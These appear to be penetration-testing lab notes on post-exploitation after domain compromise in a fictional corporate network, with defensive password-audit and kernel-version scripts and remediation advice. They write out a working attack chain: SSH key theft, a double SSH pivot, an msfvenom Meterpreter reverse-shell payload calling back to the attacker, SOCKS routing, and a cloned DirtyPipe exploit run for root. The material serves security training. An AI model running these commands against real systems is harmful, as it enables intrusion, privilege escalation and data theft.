Post-exploitation activities maximize the value of an assessment after Domain Administrator access has been achieved. Perform domain password analysis, establish a double pivot into protected networks, exploit kernel vulnerabilities, and demonstrate comprehensive impact through systematic post-compromise enumeration and additional security assessments.
# Complete credential extraction results:
- Total password hashes obtained: [COUNT]
- Password hashes successfully cracked: [COUNT]
- Percentage of passwords cracked: [PERCENTAGE]%
- Domain Admin passwords cracked: [COUNT]
- Enterprise Admin passwords cracked: [COUNT]
# DPAT analysis tool usage:
python dpat.py -n ntds_hashes.txt -c cracked_passwords.txt
# Output: Comprehensive password statistics and visualizations
# Common password patterns discovered:
- Top 10 most common passwords
- Password length distribution analysis
- Keyboard walk patterns (12qwaszx, etc.)
- Seasonal password variations
- Company-specific password themes
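As an added example (not the notes' own code and not DPAT itself), the core of the password-audit statistics described above, computed from a secretsdump-style NTDS dump and a hashcat-style cracked list. The sample dump, the cracked list, the Domain Admins membership and the keyboard-walk and season word lists are constructed assumptions:

```python
from collections import Counter

# Constructed sample: secretsdump-style "domain\user:rid:lmhash:nthash:::" lines
NTDS_SAMPLE = """\
INLANEFREIGHT\\administrator:500:aad3b435b51404eeaad3b435b51404ee:aa0000000000000000000000000000a1:::
INLANEFREIGHT\\jsmith:1105:aad3b435b51404eeaad3b435b51404ee:aa0000000000000000000000000000a2:::
INLANEFREIGHT\\tjones:1106:aad3b435b51404eeaad3b435b51404ee:aa0000000000000000000000000000a3:::
INLANEFREIGHT\\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:aa0000000000000000000000000000a4:::
INLANEFREIGHT\\mwhite:1108:aad3b435b51404eeaad3b435b51404ee:aa0000000000000000000000000000a2:::
"""
# Constructed sample: hashcat --show style "nthash:plaintext" lines
CRACKED_SAMPLE = """\
aa0000000000000000000000000000a2:Summer2022!
aa0000000000000000000000000000a3:12qwaszx
aa0000000000000000000000000000a4:Inlanefreight1
"""
DOMAIN_ADMINS = {"administrator", "svc_backup"}  # assumed group membership
KEYBOARD_WALKS = ("qwerty", "12qwaszx", "1qaz2wsx", "asdf", "zxcv")
SEASONS = ("spring", "summer", "autumn", "fall", "winter")

def parse_ntds(text):
    """Map NT hash -> list of sAMAccountNames (several accounts may share one hash)."""
    by_hash = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4:
            sam = parts[0].split("\\")[-1].lower()
            by_hash.setdefault(parts[3].lower(), []).append(sam)
    return by_hash

def parse_cracked(text):
    """Map NT hash -> recovered plaintext."""
    return dict(line.split(":", 1) for line in text.splitlines() if ":" in line)

def analyze(ntds_text, cracked_text, admins, company="inlanefreight"):
    """Return (statistics dict, password-length histogram) for the report."""
    by_hash, cracked = parse_ntds(ntds_text), parse_cracked(cracked_text)
    stats, lengths = Counter(), Counter()
    stats["accounts"] = sum(len(v) for v in by_hash.values())
    for h, pw in cracked.items():
        sams = by_hash.get(h.lower(), [])            # every account sharing this hash
        stats["cracked"] += len(sams)
        stats["admins_cracked"] += sum(s in admins for s in sams)
        lengths[len(pw)] += 1                        # one entry per unique password
        low = pw.lower()
        stats["keyboard_walk"] += any(w in low for w in KEYBOARD_WALKS)
        stats["seasonal"] += any(s in low for s in SEASONS) and any(c.isdigit() for c in pw)
        stats["company_theme"] += company in low
    stats["pct_cracked"] = round(100 * stats["cracked"] / stats["accounts"], 1)
    return dict(stats), dict(lengths)
```

Because accounts are matched by NT hash, two users with the same password are both counted as cracked once the hash is recovered, which is the count the report needs.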
# Security recommendations:
- Implement stronger password complexity requirements
- Deploy password blacklisting solutions
- Increase minimum password length requirements
- Implement regular password rotation policies
# Comprehensive AD security analysis
PingCastle.exe --healthcheck --server DC01.INLANEFREIGHT.LOCAL
# Key areas analyzed:
- Privileged account security
- Group membership configurations
- Trust relationship security
- Certificate authority configuration
- GPO security settings
- Kerberos configuration analysis
# Report integration:
- Include PingCastle findings in appendices
- Translate technical findings to business impact
- Provide prioritized remediation roadmap
# Best practice recommendations:
- Excessive privilege identification
- Stale account discovery
- Service account analysis
- GPO security review
- Trust relationship assessment
- Certificate template analysis
# Target: 172.16.9.0/23 subnet (management network)
# Goal: Access "crown jewels" servers
# Challenge: Should not be directly accessible from principal domain
# Network topology:
Attack Host → dmz01 (172.16.8.120) → DC01 (172.16.9.3) → MGMT01 (172.16.9.25)
# SSH private key location:
C:\Department Shares\IT\Private\Networking\
# Available keys:
ssmallsadm-id_rsa # Management network access
[other_user]-id_rsa # Additional network access
[admin_user]-id_rsa # Privileged access keys
# Key extraction via Evil-WinRM:
download "C:\Department Shares\IT\Private\Networking\ssmallsadm-id_rsa" ./ssmallsadm-key
# Phase 1: SSH Local Port Forwarding (Attack → DMZ01)
ssh -i id_rsa -L 5985:172.16.8.3:5985 root@DMZ01_IP
# Result: Local WinRM access to DC01
# Phase 2: SSH Reverse Port Forwarding (DMZ01 → Attack)
ssh -i id_rsa -R 1234:ATTACK_IP:8443 root@DMZ01_IP
# Result: Reverse tunnel for DC01 → Attack host communication
# Phase 3: Meterpreter Payload Chain
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.120 LPORT=1234 -f exe -o dc_shell.exe
# Target: DMZ01 internal interface, tunneled to attack host
# Multi/handler setup
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 8443
run
# DC01 payload execution
.\dc_shell.exe
# Result: Meterpreter session through double tunnel
# Route addition for management network
run autoroute -s 172.16.9.0/23
# Result: Direct access to protected subnet
# SOCKS proxy establishment
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run
# Result: ProxyChains access to 172.16.9.0/23
# Management network connectivity test
proxychains nmap -sT -p 22 172.16.9.25
# Result: SSH service accessible
# SSH key authentication
chmod 600 ssmallsadm-key
proxychains ssh -i ssmallsadm-key ssmallsadm@172.16.9.25
# Successful access:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.10.0-051000-generic x86_64)
ssmallsadm@MGMT01:~$
# Kernel version analysis
uname -a
# Output: Linux MGMT01 5.10.0-051000-generic #202012132330 SMP
# Vulnerability research:
CVE-2022-0847 (DirtyPipe) - Kernel 5.10.0 vulnerable
# Impact: Local privilege escalation to root
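An added example, not part of the original notes: a version-window check for CVE-2022-0847 (Dirty Pipe) that a defender can run over `uname -a` output during triage or patch verification. It assumes the upstream fixed releases 5.10.102, 5.15.25 and 5.16.11 (with 5.8 as the first affected version); distribution kernels with backported fixes are not visible to a version test, so the verdict is triage input, not proof:

```python
import re

# Upstream stable releases that contain the fix (February 2022). Version checks
# alone cannot see distro backports, so treat the result as triage input only.
FIXED_IN = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}
FIRST_AFFECTED = (5, 8, 0)      # bug introduced in 5.8
MAINLINE_FIXED = (5, 17, 0)     # 5.17 and later were released with the fix


def parse_release(release):
    """Extract (major, minor, patch) from `uname -r` output such as
    '5.10.0-051000-generic' or '5.15.0-1014-aws'."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x or 0) for x in m.groups())


def dirtypipe_affected(release):
    """True when the upstream kernel version is inside the CVE-2022-0847 window."""
    v = parse_release(release)
    if v < FIRST_AFFECTED or v >= MAINLINE_FIXED:
        return False
    fixed = FIXED_IN.get(v[:2])
    if fixed is None:
        # 5.8, 5.9 and 5.11-5.14 were end-of-life before the fix: no patched
        # upstream release exists, so every version on those branches is affected.
        return True
    return v < fixed


def assess(uname_a):
    """Triage a full `uname -a` line (the third field is the release string)."""
    fields = uname_a.split()
    if len(fields) < 3:
        raise ValueError("expected `uname -a` output")
    release = fields[2]
    affected = dirtypipe_affected(release)
    verdict = ("CVE-2022-0847 applies: move to a fixed release or confirm a vendor backport"
               if affected else "upstream version is outside the affected window")
    return {"host": fields[1], "release": release, "affected": affected, "verdict": verdict}


if __name__ == "__main__":
    # The uname -a line from the MGMT01 session in the notes above
    print(assess("Linux MGMT01 5.10.0-051000-generic #202012132330 SMP"))
```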
# SUID binary enumeration
find / -perm -4000 2>/dev/null
# Target: /usr/lib/openssh/ssh-keysign
# Exploit acquisition
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cat exploit-2.c # Copy exploit code
# Target system compilation
vim exploit.c # Paste exploit code
gcc exploit.c -o dirtypipe
chmod +x dirtypipe
# SUID binary exploitation
./dirtypipe /usr/lib/openssh/ssh-keysign
# Expected output:
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# Root access verification:
# id
uid=0(root) gid=0(root) groups=0(root),1001(ssmallsadm)
# Achievement summary:
- Protected network access achieved
- Management server root compromise
- "Crown jewels" server access demonstrated
- Complete network segmentation bypass
# Impact demonstration:
- Access to sensitive management infrastructure
- Potential for additional network discovery
- Complete enterprise environment compromise
# File share enumeration with Domain Admin access
*Evil-WinRM* PS C:\> cd "C:\Department Shares"
*Evil-WinRM* PS C:\Department Shares> dir
# High-value targets:
Accounting/ # Financial data access
Executives/ # Executive communications
Finance/ # Budget and financial planning
HR/ # Employee personal information
R&D/ # Intellectual property and research
# Evidence collection:
- Screenshot file listings (do not open individual files)
- Document access capabilities
- Assess data classification requirements
# DLP capability assessment (with client approval):
- Test various exfiltration methods
- Evaluate detection capabilities
- Use mock data only (no real sensitive data)
- Document detection/prevention results
# Common exfiltration vectors:
- Email attachments
- Cloud storage uploads
- DNS tunneling
- Encrypted channels
- USB device simulation
# Trust relationship analysis:
- Child → Parent domain trusts
- Intra-forest trust relationships
- External forest trusts
- Cross-domain privilege escalation
# Attack scenarios:
- Kerberoasting across trusts
- Golden ticket attacks
- Inter-domain privilege escalation
- Partner domain compromise impact
# Quantitative metrics:
- Total hosts compromised: [COUNT]
- Credential pairs discovered: [COUNT]
- Critical vulnerabilities identified: [COUNT]
- Network segments accessed: [COUNT]
- Data repositories accessible: [COUNT]
# Qualitative impact:
- Business process disruption potential
- Intellectual property exposure risk
- Financial data access capabilities
- Regulatory compliance implications
# Business impact demonstration:
- Complete network infrastructure access
- Sensitive data repository compromise
- Management network segmentation bypass
- Crown jewels server access achievement
# Risk prioritization:
- Immediate remediation requirements
- Short-term security improvements
- Long-term strategic recommendations
- Compliance and regulatory considerations
# Lab 1: Management Network Access
1. Double pivot setup → SSH + Metasploit routing
2. SSH key discovery → Department Shares enumeration
3. Protected network access → 172.16.9.25 connectivity
4. Management server access → ssmallsadm authentication
5. Flag retrieval → User home directory
# Lab 2: Root Privilege Escalation
1. Kernel vulnerability identification → CVE-2022-0847
2. DirtyPipe exploit compilation → gcc exploit.c
3. SUID binary exploitation → ssh-keysign hijacking
4. Root shell acquisition → uid=0 access
5. Flag retrieval → /root/flag.txt
# Complex pivoting:
- Multi-hop network traversal
- Reverse port forwarding chains
- Metasploit routing integration
- ProxyChains tunnel management
# Post-compromise value:
- Comprehensive domain analysis
- Protected network access
- Kernel exploitation techniques
- Professional impact demonstration
# Segmentation improvements:
- Implement proper network isolation
- Deploy next-generation firewalls
- Restrict management network access
- Monitor inter-segment communication
# Access controls:
- Implement privileged access management
- Deploy jump boxes for administrative access
- Restrict direct domain admin access
- Implement just-in-time administration
# Monitoring enhancements:
- Deploy advanced threat detection
- Implement network traffic analysis
- Monitor privileged account usage
- Deploy endpoint detection and response
# Incident response:
- Develop compromise detection procedures
- Implement automated response capabilities
- Regular security assessment programs
- Continuous security monitoring
# External → Domain Admin → Protected Network Root:
Phase 1: External reconnaissance and web application testing
Phase 2: Initial access via command injection and privilege escalation
Phase 3: Internal network pivoting and credential harvesting
Phase 4: Lateral movement and Active Directory enumeration
Phase 5: Domain compromise via targeted Kerberoasting and DCSync
Phase 6: Protected network access and kernel exploitation
# Total impact:
- Complete enterprise network compromise
- All network segments accessed
- Sensitive data repositories compromised
- Management infrastructure controlled
# Client deliverables:
- Comprehensive vulnerability assessment
- Complete attack path documentation
- Detailed remediation recommendations
- Executive summary with business impact
- Technical appendices with evidence
- Password analysis and recommendations
# Above-and-beyond value:
- Active Directory security audit
- Protected network assessment
- Data classification review
- Trust relationship analysis
- Compliance gap identification